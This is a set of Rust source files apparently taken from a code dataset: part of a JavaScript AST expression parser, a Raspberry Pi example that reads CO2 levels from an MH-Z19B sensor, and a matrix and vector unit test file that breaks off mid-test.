"++" => UpdOp::Increment,
"--" => UpdOp::Decrement,
_ => {
return Err(ParseError::UnexpectedValue {
want: "++ or --",
value: source.to_error(),
})
}
};
Ok(UpdateExpression(op, prefix, argument))
}
}
impl ParseFrom for SequenceExpression {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
let exprs = source.map_array("expressions", |jexpr| Expression::parse_from(jexpr, ctx))?;
Ok(SequenceExpression(exprs))
}
}
impl ParseFrom for BinaryExpression {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
let left = source.map_node("left", |jleft| Expression::parse_from(jleft, ctx))?;
let right = source.map_node("right", |jright| Expression::parse_from(jright, ctx))?;
let opstr = source.get_str("operator")?;
let op = match opstr.as_str() {
"+" => BinOp::Plus,
"-" => BinOp::Minus,
"*" => BinOp::Star,
"/" => BinOp::Slash,
"%" => BinOp::Percent,
"==" => BinOp::EqEq,
"===" => BinOp::EqEqEq,
"!=" => BinOp::NotEq,
"!==" => BinOp::NotEqEq,
"<" => BinOp::Less,
">" => BinOp::Greater,
"<=" => BinOp::LtEq,
">=" => BinOp::GtEq,
"|" => BinOp::Pipe,
"^" => BinOp::Hat,
"&" => BinOp::Ampersand,
"<<" => BinOp::LtLt,
">>" => BinOp::GtGt,
">>>" => BinOp::GtGtGt,
"in" => BinOp::In,
"instanceof" => BinOp::InstanceOf,
_ => {
return Err(ParseError::UnexpectedValue {
want: "one of: + - * / % == === != < > <= >= instanceof | ^ & << >> >>>",
value: source.map_node("operator", |jop| Ok(jop.to_error()))?,
})
}
};
Ok(BinaryExpression(left, op, right))
}
}
impl ParseFrom for LogicalExpression {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
let opstr = source.get_str("operator")?;
let op = match opstr.as_str() {
"&&" => BoolOp::And,
"||" => BoolOp::Or,
_ => {
return Err(ParseError::UnexpectedValue {
want: "&& or ||",
value: source.map_node("operator", |jop| Ok(jop.to_error()))?,
})
}
};
let left = source.map_node("left", |jleft| Expression::parse_from(jleft, ctx))?;
let right = source.map_node("right", |jright| Expression::parse_from(jright, ctx))?;
Ok(LogicalExpression(left, op, right))
}
}
impl ParseFrom for AssignmentExpression {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
let jop = source.get_str("operator")?;
let modop = match jop.as_str() {
"=" => None,
"+=" => Some(BinOp::Plus),
"-=" => Some(BinOp::Minus),
"*=" => Some(BinOp::Star),
"/=" => Some(BinOp::Slash),
"%=" => Some(BinOp::Percent),
"<<=" => Some(BinOp::LtLt),
">>=" => Some(BinOp::GtGt),
">>>=" => Some(BinOp::GtGtGt),
"|=" => Some(BinOp::Pipe),
"^=" => Some(BinOp::Hat),
"&=" => Some(BinOp::Ampersand),
_ => {
return Err(ParseError::UnexpectedValue {
want: "one of: = += -= *= /= %= <<= >>= >>>= |= ^= &=",
value: source.map_node("operator", |jop| Ok(jop.to_error()))?,
})
}
};
let right = source.map_node("right", |jright| Expression::parse_from(jright, ctx))?;
let left = source.map_node("left", |jleft| Expression::parse_from(jleft, ctx))?;
Ok(AssignmentExpression(left, modop, right))
}
}
impl ParseFrom for ObjectExpression {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
source.expect_str("type", "ObjectExpression")?;
let properties = source.map_array("properties", |jprop| {
jprop.expect_str("type", "Property")?;
let keyexpr = jprop.map_node("key", |jkey| Expression::parse_from(jkey, ctx))?;
let key = if jprop.get_bool("computed")? {
ObjectKey::Computed(keyexpr)
} else {
match keyexpr.expr {
Expr::Identifier(ident) => ObjectKey::Identifier(ident.0),
Expr::Literal(lit) => match lit.to_json().as_str() {
Some(val) => ObjectKey::Identifier(val.into()),
None => ObjectKey::Identifier(lit.to_string().into()),
},
_ => {
return Err(ParseError::UnexpectedValue {
want: "Identifier|Literal",
value: jprop.to_error(),
})
}
}
};
let value = jprop.map_node("value", |jval| Expression::parse_from(jval, ctx))?;
Ok((key, value))
})?;
Ok(ObjectExpression(properties))
}
}
impl ParseFrom for FunctionExpression {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
let id: Option<Identifier> =
source.map_opt_node("id", |jid| Identifier::parse_from(jid, ctx))?;
let mut inner_ctx = ParserContext::new();
let params = source.map_array("params", |jparam| {
Identifier::parse_from(jparam, &mut inner_ctx)
})?;
let body = source.map_node("body", |jbody| {
BlockStatement::parse_from(jbody, &mut inner_ctx)
})?;
let ParserContext {
used_identifiers: mut free_variables,
declared_variables: variables,
declared_functions: functions,
declared_bindings,
} = inner_ctx;
assert!(declared_bindings.is_empty());
free_variables.remove(&Identifier::from("arguments"));
for var in params.iter().chain(variables.iter()) {
free_variables.remove(var);
}
ctx.used_identifiers.extend(free_variables.iter().cloned());
let func = Function {
id,
params,
variables,
functions,
free_variables,
body,
is_generator: source.get_bool("generator").unwrap_or(false),
is_expression: source.get_bool("expression").unwrap_or(false),
is_async: source.get_bool("async").unwrap_or(false),
};
Ok(FunctionExpression {
func: Rc::new(func),
})
}
}
| true |
62be7b9b2c30ebb2ec0913035d07b5191bb185a9
|
Rust
|
peterholak/mh_z19b
|
/examples/raspberry.rs
|
UTF-8
| 703 | 2.71875 | 3 |
[
"MIT"
] |
permissive
|
use mh_z19b::mhz19b;
use std::time::Duration;
use std::thread::sleep;
fn main() {
let port_name = "/dev/ttyAMA0";
// On Windows with a USB to serial adapter.
// let port_name = "COM4";
let mut port = mhz19b::serial::connect(port_name, Duration::from_secs(5))
.expect("Failed to connect.");
println!("Connected.");
if let Err(e) = mhz19b::set_auto_correction(&mut port, false) {
eprintln!("Failed to disable auto-correction: {}", e);
}
for _ in 0..5 {
match mhz19b::read_co2(&mut port) {
Ok(co2) => println!("CO2 level: {}", co2),
Err(e) => eprintln!("{}", e)
};
sleep(Duration::from_secs(3));
}
}
| true |
4fd8feab9d860a1d6d83fd8a9fe186c56b558c09
|
Rust
|
Feldar99/RustEngine
|
/math/tests/matrix.rs
|
UTF-8
| 29,721 | 3.40625 | 3 |
[] |
no_license
|
extern crate math;
extern crate num;
#[cfg(test)]
mod tests {
use math::matrix::Mat4;
use math::matrix::Mat3;
use math::vector::Vec4;
use math::vector::Vec3;
use math::vector::Vec2;
use num::Zero;
use num::One;
const EPSILON:f32 = 0.0005;
macro_rules! assert_approx_eq {
($left:expr, $right:expr, $epsilon:expr) => {
assert!(($left) < ($right) + ($epsilon),
"\nleft: `{}`,\n right: `{}`,\n epsilon: {}\n\n",
$left,
$right,
$epsilon
);
assert!(($left) > ($right) - ($epsilon),
"\nleft: `{}`,\n right: `{}`,\n epsilon: {}\n\n",
$left,
$right,
$epsilon
);
}
}
fn test_mat4_1() -> Mat4<i32> {
Mat4{values: [Vec4{x: 1, y: 2, z: 3, w: 4 },
Vec4{x: 5, y: 6, z: 7, w: 8 },
Vec4{x: 9, y: 10, z: 11, w: 12},
Vec4{x: 13, y: 14, z: 15, w: 16}]}
}
fn test_mat4_2() -> Mat4<i32> {
Mat4{values: [Vec4{x: 17, y: 18, z: 19, w: 20},
Vec4{x: 21, y: 22, z: 23, w: 24},
Vec4{x: 25, y: 26, z: 27, w: 28},
Vec4{x: 29, y: 30, z: 31, w: 32}]}
}
fn test_mat3_1() -> Mat3<i32> {
Mat3{values: [Vec3{x: 33, y: 34, z: 35},
Vec3{x: 36, y: 37, z: 38},
Vec3{x: 39, y: 40, z: 41}]}
}
fn test_mat3_2() -> Mat3<i32> {
Mat3{values: [Vec3{x: 42, y: 43, z: 44},
Vec3{x: 45, y: 46, z: 47},
Vec3{x: 48, y: 49, z: 50}]}
}
fn test_vec4() -> Vec4<i32> {
Vec4{x: 1, y: 2, z: 3, w: 1}
}
fn test_vec4f() -> Vec4<f32> {
Vec4{x: 1.0, y: 2.0, z: 3.0, w: 0.0}
}
fn test_vec3() -> Vec3<i32> {
Vec3{x: 5, y: 6, z: 1}
}
fn test_vec3f_1() -> Vec3<f32> {
Vec3{x: 5.0, y: 6.0, z: 1.0}
}
fn test_vec3f_2() -> Vec3<f32> {
Vec3{x: 10.0, y: 11.0, z: 1.0}
}
fn test_vec2() -> Vec2<i32> {
Vec2{x: 8, y: 9}
}
#[test]
fn can_create_matrices () {
let m4 = test_mat4_1();
let m3 = test_mat3_1();
assert_eq!(m4.values[0].x, 1);
assert_eq!(m4.values[0].y, 2);
assert_eq!(m4.values[0].z, 3);
assert_eq!(m4.values[0].w, 4);
assert_eq!(m4.values[1].x, 5);
assert_eq!(m4.values[1].y, 6);
assert_eq!(m4.values[1].z, 7);
assert_eq!(m4.values[1].w, 8);
assert_eq!(m4.values[2].x, 9);
assert_eq!(m4.values[2].y, 10);
assert_eq!(m4.values[2].z, 11);
assert_eq!(m4.values[2].w, 12);
assert_eq!(m4.values[3].x, 13);
assert_eq!(m4.values[3].y, 14);
assert_eq!(m4.values[3].z, 15);
assert_eq!(m4.values[3].w, 16);
assert_eq!(m3.values[0].x, 33);
assert_eq!(m3.values[0].y, 34);
assert_eq!(m3.values[0].z, 35);
assert_eq!(m3.values[1].x, 36);
assert_eq!(m3.values[1].y, 37);
assert_eq!(m3.values[1].z, 38);
assert_eq!(m3.values[2].x, 39);
assert_eq!(m3.values[2].y, 40);
assert_eq!(m3.values[2].z, 41);
}
#[test]
fn has_zero_matrix () {
let m4 = Mat4::<i32>::zero();
let m3 = Mat3::<i32>::zero();
assert_eq!(m4.values[0].x, 0);
assert_eq!(m4.values[0].y, 0);
assert_eq!(m4.values[0].z, 0);
assert_eq!(m4.values[0].w, 0);
assert_eq!(m4.values[1].x, 0);
assert_eq!(m4.values[1].y, 0);
assert_eq!(m4.values[1].z, 0);
assert_eq!(m4.values[1].w, 0);
assert_eq!(m4.values[2].x, 0);
assert_eq!(m4.values[2].y, 0);
assert_eq!(m4.values[2].z, 0);
assert_eq!(m4.values[2].w, 0);
assert_eq!(m4.values[3].x, 0);
assert_eq!(m4.values[3].y, 0);
assert_eq!(m4.values[3].z, 0);
assert_eq!(m4.values[3].w, 0);
assert_eq!(m3.values[0].x, 0);
assert_eq!(m3.values[0].y, 0);
assert_eq!(m3.values[0].z, 0);
assert_eq!(m3.values[1].x, 0);
assert_eq!(m3.values[1].y, 0);
assert_eq!(m3.values[1].z, 0);
assert_eq!(m3.values[2].x, 0);
assert_eq!(m3.values[2].y, 0);
assert_eq!(m3.values[2].z, 0);
}
#[test]
fn can_test_for_zero_matrix () {
let z4 = Mat4::<i32>::zero();
let z3 = Mat3::<i32>::zero();
assert!(z4.is_zero());
assert!(z3.is_zero());
let m4 = test_mat4_1();
let m3 = test_mat3_1();
assert!(!m4.is_zero());
assert!(!m3.is_zero());
}
#[test]
fn has_identity_matrix () {
let m4 = Mat4::<i32>::one();
assert_eq!(m4.values[0].x, 1);
assert_eq!(m4.values[0].y, 0);
assert_eq!(m4.values[0].z, 0);
assert_eq!(m4.values[0].w, 0);
assert_eq!(m4.values[1].x, 0);
assert_eq!(m4.values[1].y, 1);
assert_eq!(m4.values[1].z, 0);
assert_eq!(m4.values[1].w, 0);
assert_eq!(m4.values[2].x, 0);
assert_eq!(m4.values[2].y, 0);
assert_eq!(m4.values[2].z, 1);
assert_eq!(m4.values[2].w, 0);
assert_eq!(m4.values[3].x, 0);
assert_eq!(m4.values[3].y, 0);
assert_eq!(m4.values[3].z, 0);
assert_eq!(m4.values[3].w, 1);
let m3 = Mat3::<i32>::one();
assert_eq!(m3.values[0].x, 1);
assert_eq!(m3.values[0].y, 0);
assert_eq!(m3.values[0].z, 0);
assert_eq!(m3.values[1].x, 0);
assert_eq!(m3.values[1].y, 1);
assert_eq!(m3.values[1].z, 0);
assert_eq!(m3.values[2].x, 0);
assert_eq!(m3.values[2].y, 0);
assert_eq!(m3.values[2].z, 1);
}
#[test]
fn can_add_matrices () {
let m4 = test_mat4_1() + test_mat4_2();
let m3 = test_mat3_1() + test_mat3_2();
assert_eq!(m4.values[0].x, 18);
assert_eq!(m4.values[0].y, 20);
assert_eq!(m4.values[0].z, 22);
assert_eq!(m4.values[0].w, 24);
assert_eq!(m4.values[1].x, 26);
assert_eq!(m4.values[1].y, 28);
assert_eq!(m4.values[1].z, 30);
assert_eq!(m4.values[1].w, 32);
assert_eq!(m4.values[2].x, 34);
assert_eq!(m4.values[2].y, 36);
assert_eq!(m4.values[2].z, 38);
assert_eq!(m4.values[2].w, 40);
assert_eq!(m4.values[3].x, 42);
assert_eq!(m4.values[3].y, 44);
assert_eq!(m4.values[3].z, 46);
assert_eq!(m4.values[3].w, 48);
assert_eq!(m3.values[0].x, 75);
assert_eq!(m3.values[0].y, 77);
assert_eq!(m3.values[0].z, 79);
assert_eq!(m3.values[1].x, 81);
assert_eq!(m3.values[1].y, 83);
assert_eq!(m3.values[1].z, 85);
assert_eq!(m3.values[2].x, 87);
assert_eq!(m3.values[2].y, 89);
assert_eq!(m3.values[2].z, 91);
}
#[test]
fn can_add_assign_matrices () {
let mut m4 = test_mat4_1();
let mut m3 = test_mat3_1();
m4 += test_mat4_2();
m3 += test_mat3_2();
assert_eq!(m4.values[0].x, 18);
assert_eq!(m4.values[0].y, 20);
assert_eq!(m4.values[0].z, 22);
assert_eq!(m4.values[0].w, 24);
assert_eq!(m4.values[1].x, 26);
assert_eq!(m4.values[1].y, 28);
assert_eq!(m4.values[1].z, 30);
assert_eq!(m4.values[1].w, 32);
assert_eq!(m4.values[2].x, 34);
assert_eq!(m4.values[2].y, 36);
assert_eq!(m4.values[2].z, 38);
assert_eq!(m4.values[2].w, 40);
assert_eq!(m4.values[3].x, 42);
assert_eq!(m4.values[3].y, 44);
assert_eq!(m4.values[3].z, 46);
assert_eq!(m4.values[3].w, 48);
assert_eq!(m3.values[0].x, 75);
assert_eq!(m3.values[0].y, 77);
assert_eq!(m3.values[0].z, 79);
assert_eq!(m3.values[1].x, 81);
assert_eq!(m3.values[1].y, 83);
assert_eq!(m3.values[1].z, 85);
assert_eq!(m3.values[2].x, 87);
assert_eq!(m3.values[2].y, 89);
assert_eq!(m3.values[2].z, 91);
}
#[test]
fn can_negate_matrices () {
let m4 = -test_mat4_1();
let m3 = -test_mat3_1();
assert_eq!(m4.values[0].x, -1);
assert_eq!(m4.values[0].y, -2);
assert_eq!(m4.values[0].z, -3);
assert_eq!(m4.values[0].w, -4);
assert_eq!(m4.values[1].x, -5);
assert_eq!(m4.values[1].y, -6);
assert_eq!(m4.values[1].z, -7);
assert_eq!(m4.values[1].w, -8);
assert_eq!(m4.values[2].x, -9);
assert_eq!(m4.values[2].y, -10);
assert_eq!(m4.values[2].z, -11);
assert_eq!(m4.values[2].w, -12);
assert_eq!(m4.values[3].x, -13);
assert_eq!(m4.values[3].y, -14);
assert_eq!(m4.values[3].z, -15);
assert_eq!(m4.values[3].w, -16);
assert_eq!(m3.values[0].x, -33);
assert_eq!(m3.values[0].y, -34);
assert_eq!(m3.values[0].z, -35);
assert_eq!(m3.values[1].x, -36);
assert_eq!(m3.values[1].y, -37);
assert_eq!(m3.values[1].z, -38);
assert_eq!(m3.values[2].x, -39);
assert_eq!(m3.values[2].y, -40);
assert_eq!(m3.values[2].z, -41);
}
#[test]
fn can_subtract_matrices () {
let m4 = test_mat4_1() - test_mat4_2();
let m3 = test_mat3_1() - test_mat3_2();
assert_eq!(m4.values[0].x, -16);
assert_eq!(m4.values[0].y, -16);
assert_eq!(m4.values[0].z, -16);
assert_eq!(m4.values[0].w, -16);
assert_eq!(m4.values[1].x, -16);
assert_eq!(m4.values[1].y, -16);
assert_eq!(m4.values[1].z, -16);
assert_eq!(m4.values[1].w, -16);
assert_eq!(m4.values[2].x, -16);
assert_eq!(m4.values[2].y, -16);
assert_eq!(m4.values[2].z, -16);
assert_eq!(m4.values[2].w, -16);
assert_eq!(m4.values[3].x, -16);
assert_eq!(m4.values[3].y, -16);
assert_eq!(m4.values[3].z, -16);
assert_eq!(m4.values[3].w, -16);
assert_eq!(m3.values[0].x, -9);
assert_eq!(m3.values[0].y, -9);
assert_eq!(m3.values[0].z, -9);
assert_eq!(m3.values[1].x, -9);
assert_eq!(m3.values[1].y, -9);
assert_eq!(m3.values[1].z, -9);
assert_eq!(m3.values[2].x, -9);
assert_eq!(m3.values[2].y, -9);
assert_eq!(m3.values[2].z, -9);
}
#[test]
fn can_subtract_assign_matrices () {
let mut m4 = test_mat4_1();
m4 -= test_mat4_2();
let mut m3 = test_mat3_1();
m3 -= test_mat3_2();
assert_eq!(m4.values[0].x, -16);
assert_eq!(m4.values[0].y, -16);
assert_eq!(m4.values[0].z, -16);
assert_eq!(m4.values[0].w, -16);
assert_eq!(m4.values[1].x, -16);
assert_eq!(m4.values[1].y, -16);
assert_eq!(m4.values[1].z, -16);
assert_eq!(m4.values[1].w, -16);
assert_eq!(m4.values[2].x, -16);
assert_eq!(m4.values[2].y, -16);
assert_eq!(m4.values[2].z, -16);
assert_eq!(m4.values[2].w, -16);
assert_eq!(m4.values[3].x, -16);
assert_eq!(m4.values[3].y, -16);
assert_eq!(m4.values[3].z, -16);
assert_eq!(m4.values[3].w, -16);
assert_eq!(m3.values[0].x, -9);
assert_eq!(m3.values[0].y, -9);
assert_eq!(m3.values[0].z, -9);
assert_eq!(m3.values[1].x, -9);
assert_eq!(m3.values[1].y, -9);
assert_eq!(m3.values[1].z, -9);
assert_eq!(m3.values[2].x, -9);
assert_eq!(m3.values[2].y, -9);
assert_eq!(m3.values[2].z, -9);
}
#[test]
fn can_multiply_matrices_by_scalars () {
let m4 = test_mat4_1() * 2;
let m3 = test_mat3_1() * 3;
assert_eq!(m4.values[0].x, 2);
assert_eq!(m4.values[0].y, 4);
assert_eq!(m4.values[0].z, 6);
assert_eq!(m4.values[0].w, 8);
assert_eq!(m4.values[1].x, 10);
assert_eq!(m4.values[1].y, 12);
assert_eq!(m4.values[1].z, 14);
assert_eq!(m4.values[1].w, 16);
assert_eq!(m4.values[2].x, 18);
assert_eq!(m4.values[2].y, 20);
assert_eq!(m4.values[2].z, 22);
assert_eq!(m4.values[2].w, 24);
assert_eq!(m4.values[3].x, 26);
assert_eq!(m4.values[3].y, 28);
assert_eq!(m4.values[3].z, 30);
assert_eq!(m4.values[3].w, 32);
assert_eq!(m3.values[0].x, 99);
assert_eq!(m3.values[0].y, 102);
assert_eq!(m3.values[0].z, 105);
assert_eq!(m3.values[1].x, 108);
assert_eq!(m3.values[1].y, 111);
assert_eq!(m3.values[1].z, 114);
assert_eq!(m3.values[2].x, 117);
assert_eq!(m3.values[2].y, 120);
assert_eq!(m3.values[2].z, 123);
}
#[test]
fn can_multiply_matrices_by_vectors () {
let v4 = test_mat4_1() * test_vec4();
let v3 = test_mat3_1() * test_vec3();
assert_eq!(v4.x, 18);
assert_eq!(v4.y, 46);
assert_eq!(v4.z, 74);
assert_eq!(v4.w, 102);
assert_eq!(v3.x, 404);
assert_eq!(v3.y, 440);
assert_eq!(v3.z, 476);
}
#[test]
fn can_multiply_matrices () {
let m4 = test_mat4_1() * test_mat4_2();
assert_eq!(m4.values[0][0], 250);
assert_eq!(m4.values[0][1], 260);
assert_eq!(m4.values[0][2], 270);
assert_eq!(m4.values[0][3], 280);
assert_eq!(m4.values[1][0], 618);
assert_eq!(m4.values[1][1], 644);
assert_eq!(m4.values[1][2], 670);
assert_eq!(m4.values[1][3], 696);
assert_eq!(m4.values[2][0], 986);
assert_eq!(m4.values[2][1], 1028);
assert_eq!(m4.values[2][2], 1070);
assert_eq!(m4.values[2][3], 1112);
assert_eq!(m4.values[3][0], 1354);
assert_eq!(m4.values[3][1], 1412);
assert_eq!(m4.values[3][2], 1470);
assert_eq!(m4.values[3][3], 1528);
let m3 = test_mat3_1() * test_mat3_2();
assert_eq!(m3.values[0].x, 4596);
assert_eq!(m3.values[0].y, 4698);
assert_eq!(m3.values[0].z, 4800);
assert_eq!(m3.values[1].x, 5001);
assert_eq!(m3.values[1].y, 5112);
assert_eq!(m3.values[1].z, 5223);
assert_eq!(m3.values[2].x, 5406);
assert_eq!(m3.values[2].y, 5526);
assert_eq!(m3.values[2].z, 5646);
}
#[test]
fn can_multiply_assign_matrices () {
let mut m4 = test_mat4_1();
m4 *= test_mat4_2();
assert_eq!(m4.values[0][0], 250);
assert_eq!(m4.values[0][1], 260);
assert_eq!(m4.values[0][2], 270);
assert_eq!(m4.values[0][3], 280);
assert_eq!(m4.values[1][0], 618);
assert_eq!(m4.values[1][1], 644);
assert_eq!(m4.values[1][2], 670);
assert_eq!(m4.values[1][3], 696);
assert_eq!(m4.values[2][0], 986);
assert_eq!(m4.values[2][1], 1028);
assert_eq!(m4.values[2][2], 1070);
assert_eq!(m4.values[2][3], 1112);
assert_eq!(m4.values[3][0], 1354);
assert_eq!(m4.values[3][1], 1412);
assert_eq!(m4.values[3][2], 1470);
assert_eq!(m4.values[3][3], 1528);
let mut m3 = test_mat3_1();
m3 *= test_mat3_2();
assert_eq!(m3.values[0].x, 4596);
assert_eq!(m3.values[0].y, 4698);
assert_eq!(m3.values[0].z, 4800);
assert_eq!(m3.values[1].x, 5001);
assert_eq!(m3.values[1].y, 5112);
assert_eq!(m3.values[1].z, 5223);
assert_eq!(m3.values[2].x, 5406);
assert_eq!(m3.values[2].y, 5526);
assert_eq!(m3.values[2].z, 5646);
}
#[test]
fn can_divide_matrices_by_scalars () {
let m4 = test_mat4_1() / 2;
let m3 = test_mat3_1() / 3;
assert_eq!(m4.values[0].x, 0);
assert_eq!(m4.values[0].y, 1);
assert_eq!(m4.values[0].z, 1);
assert_eq!(m4.values[0].w, 2);
assert_eq!(m4.values[1].x, 2);
assert_eq!(m4.values[1].y, 3);
assert_eq!(m4.values[1].z, 3);
assert_eq!(m4.values[1].w, 4);
assert_eq!(m4.values[2].x, 4);
assert_eq!(m4.values[2].y, 5);
assert_eq!(m4.values[2].z, 5);
assert_eq!(m4.values[2].w, 6);
assert_eq!(m4.values[3].x, 6);
assert_eq!(m4.values[3].y, 7);
assert_eq!(m4.values[3].z, 7);
assert_eq!(m4.values[3].w, 8);
assert_eq!(m3.values[0].x, 11);
assert_eq!(m3.values[0].y, 11);
assert_eq!(m3.values[0].z, 11);
assert_eq!(m3.values[1].x, 12);
assert_eq!(m3.values[1].y, 12);
assert_eq!(m3.values[1].z, 12);
assert_eq!(m3.values[2].x, 13);
assert_eq!(m3.values[2].y, 13);
assert_eq!(m3.values[2].z, 13);
}
#[test]
fn can_divide_assign_matrices_by_scalars () {
let mut m4 = test_mat4_1();
m4 /= 2;
let mut m3 = test_mat3_1();
m3 /= 3;
assert_eq!(m4.values[0].x, 0);
assert_eq!(m4.values[0].y, 1);
assert_eq!(m4.values[0].z, 1);
assert_eq!(m4.values[0].w, 2);
assert_eq!(m4.values[1].x, 2);
assert_eq!(m4.values[1].y, 3);
assert_eq!(m4.values[1].z, 3);
assert_eq!(m4.values[1].w, 4);
assert_eq!(m4.values[2].x, 4);
assert_eq!(m4.values[2].y, 5);
assert_eq!(m4.values[2].z, 5);
assert_eq!(m4.values[2].w, 6);
assert_eq!(m4.values[3].x, 6);
assert_eq!(m4.values[3].y, 7);
assert_eq!(m4.values[3].z, 7);
assert_eq!(m4.values[3].w, 8);
assert_eq!(m3.values[0].x, 11);
assert_eq!(m3.values[0].y, 11);
assert_eq!(m3.values[0].z, 11);
assert_eq!(m3.values[1].x, 12);
assert_eq!(m3.values[1].y, 12);
assert_eq!(m3.values[1].z, 12);
assert_eq!(m3.values[2].x, 13);
assert_eq!(m3.values[2].y, 13);
assert_eq!(m3.values[2].z, 13);
}
#[test]
fn can_index_matrices () {
let m4 = test_mat4_1();
let m3 = test_mat3_1();
assert_eq!(m4[0].x, 1);
assert_eq!(m4[0].y, 2);
assert_eq!(m4[0].z, 3);
assert_eq!(m4[0].w, 4);
assert_eq!(m4[1].x, 5);
assert_eq!(m4[1].y, 6);
assert_eq!(m4[1].z, 7);
assert_eq!(m4[1].w, 8);
assert_eq!(m4[2].x, 9);
assert_eq!(m4[2].y, 10);
assert_eq!(m4[2].z, 11);
assert_eq!(m4[2].w, 12);
assert_eq!(m4[3].x, 13);
assert_eq!(m4[3].y, 14);
assert_eq!(m4[3].z, 15);
assert_eq!(m4[3].w, 16);
assert_eq!(m3.values[0].x, 33);
assert_eq!(m3.values[0].y, 34);
assert_eq!(m3.values[0].z, 35);
assert_eq!(m3.values[1].x, 36);
assert_eq!(m3.values[1].y, 37);
assert_eq!(m3.values[1].z, 38);
assert_eq!(m3.values[2].x, 39);
assert_eq!(m3.values[2].y, 40);
assert_eq!(m3.values[2].z, 41);
}
#[test]
#[should_panic]
fn cannot_index_matrices_out_of_bounds () {
let m4 = test_mat4_1();
let _ = m4[4];
}
#[test]
fn can_assign_to_matrices_by_index () {
let mut m4 = test_mat4_1();
m4[0].x = 17;
m4[0].y = 18;
m4[0].z = 19;
m4[0].w = 20;
m4[1].x = 21;
m4[1].y = 22;
m4[1].z = 23;
m4[1].w = 24;
m4[2].x = 25;
m4[2].y = 26;
m4[2].z = 27;
m4[2].w = 28;
m4[3].x = 29;
m4[3].y = 30;
m4[3].z = 31;
m4[3].w = 32;
assert_eq!(m4[0].x, 17);
assert_eq!(m4[0].y, 18);
assert_eq!(m4[0].z, 19);
assert_eq!(m4[0].w, 20);
assert_eq!(m4[1].x, 21);
assert_eq!(m4[1].y, 22);
assert_eq!(m4[1].z, 23);
assert_eq!(m4[1].w, 24);
assert_eq!(m4[2].x, 25);
assert_eq!(m4[2].y, 26);
assert_eq!(m4[2].z, 27);
assert_eq!(m4[2].w, 28);
assert_eq!(m4[3].x, 29);
assert_eq!(m4[3].y, 30);
assert_eq!(m4[3].z, 31);
assert_eq!(m4[3].w, 32);
let mut m3 = test_mat3_1();
m3[0].x = 42;
m3[0].y = 43;
m3[0].z = 44;
m3[1].x = 45;
m3[1].y = 46;
m3[1].z = 47;
m3[2].x = 48;
m3[2].y = 49;
m3[2].z = 50;
assert_eq!(m3[0].x, 42);
assert_eq!(m3[0].y, 43);
assert_eq!(m3[0].z, 44);
assert_eq!(m3[1].x, 45);
assert_eq!(m3[1].y, 46);
assert_eq!(m3[1].z, 47);
assert_eq!(m3[2].x, 48);
assert_eq!(m3[2].y, 49);
assert_eq!(m3[2].z, 50);
}
#[test]
#[should_panic]
fn cannot_assign_to_matrix_out_of_bounds () {
let mut m4 = test_mat4_1();
m4[4] = test_vec4();
}
#[test]
fn can_create_scale_matrix () {
let v4 = test_vec4();
let v3 = test_vec3();
let v2 = test_vec2();
let m4 = Mat4::<i32>::scale(&v3);
assert_eq!(m4[0].x, 5);
assert_eq!(m4[0].y, 0);
assert_eq!(m4[0].z, 0);
assert_eq!(m4[0].w, 0);
assert_eq!(m4[1].x, 0);
assert_eq!(m4[1].y, 6);
assert_eq!(m4[1].z, 0);
assert_eq!(m4[1].w, 0);
assert_eq!(m4[2].x, 0);
assert_eq!(m4[2].y, 0);
assert_eq!(m4[2].z, 1);
assert_eq!(m4[2].w, 0);
assert_eq!(m4[3].x, 0);
assert_eq!(m4[3].y, 0);
assert_eq!(m4[3].z, 0);
assert_eq!(m4[3].w, 1);
let scaled4 = m4 * v4;
assert_eq!(scaled4.x, v4.x * v3.x);
assert_eq!(scaled4.y, v4.y * v3.y);
assert_eq!(scaled4.z, v4.z * v3.z);
assert_eq!(scaled4.w, v4.w);
let m3 = Mat3::<i32>::scale(&v2);
assert_eq!(m3[0].x, 8);
assert_eq!(m3[0].y, 0);
assert_eq!(m3[0].z, 0);
assert_eq!(m3[1].x, 0);
assert_eq!(m3[1].y, 9);
assert_eq!(m3[1].z, 0);
assert_eq!(m3[2].x, 0);
assert_eq!(m3[2].y, 0);
assert_eq!(m3[2].z, 1);
let scaled3 = m3 * v3;
assert_eq!(scaled3.x, v3.x * v2.x);
assert_eq!(scaled3.y, v3.y * v2.y);
}
#[test]
fn can_create_translation_matrix () {
let v4 = test_vec4();
let v3 = test_vec3();
let v2 = test_vec2();
let m4 = Mat4::<i32>::translate(&v3);
assert_eq!(m4[0].x, 1);
assert_eq!(m4[0].y, 0);
assert_eq!(m4[0].z, 0);
assert_eq!(m4[0].w, 5);
assert_eq!(m4[1].x, 0);
assert_eq!(m4[1].y, 1);
assert_eq!(m4[1].z, 0);
assert_eq!(m4[1].w, 6);
assert_eq!(m4[2].x, 0);
assert_eq!(m4[2].y, 0);
assert_eq!(m4[2].z, 1);
assert_eq!(m4[2].w, 1);
assert_eq!(m4[3].x, 0);
assert_eq!(m4[3].y, 0);
assert_eq!(m4[3].z, 0);
assert_eq!(m4[3].w, 1);
let translated4 = m4 * v4;
let added4 = Vec3 {x: v4.x, y: v4.y, z: v4.z} + v3;
assert_eq!(translated4.x, added4.x);
assert_eq!(translated4.y, added4.y);
assert_eq!(translated4.z, added4.z);
let m3 = Mat3::<i32>::translate(&v2);
assert_eq!(m3[0].x, 1);
assert_eq!(m3[0].y, 0);
assert_eq!(m3[0].z, 8);
assert_eq!(m3[1].x, 0);
assert_eq!(m3[1].y, 1);
assert_eq!(m3[1].z, 9);
assert_eq!(m3[2].x, 0);
assert_eq!(m3[2].y, 0);
assert_eq!(m3[2].z, 1);
let translated3 = m3 * v3;
let added3 = Vec2 {x: v3.x, y: v3.y} + v2;
assert_eq!(translated3.x, added3.x);
assert_eq!(translated3.y, added3.y);
}
#[test]
fn can_create_cross_product_matrix () {
let v3 = test_vec3f_1();
let m3 = Mat3::<f32>::cross_product(&v3);
assert_approx_eq!(m3[0].x, 0.0, EPSILON);
assert_approx_eq!(m3[0].y, -1.0, EPSILON);
assert_approx_eq!(m3[0].z, 6.0, EPSILON);
assert_approx_eq!(m3[1].x, 1.0, EPSILON);
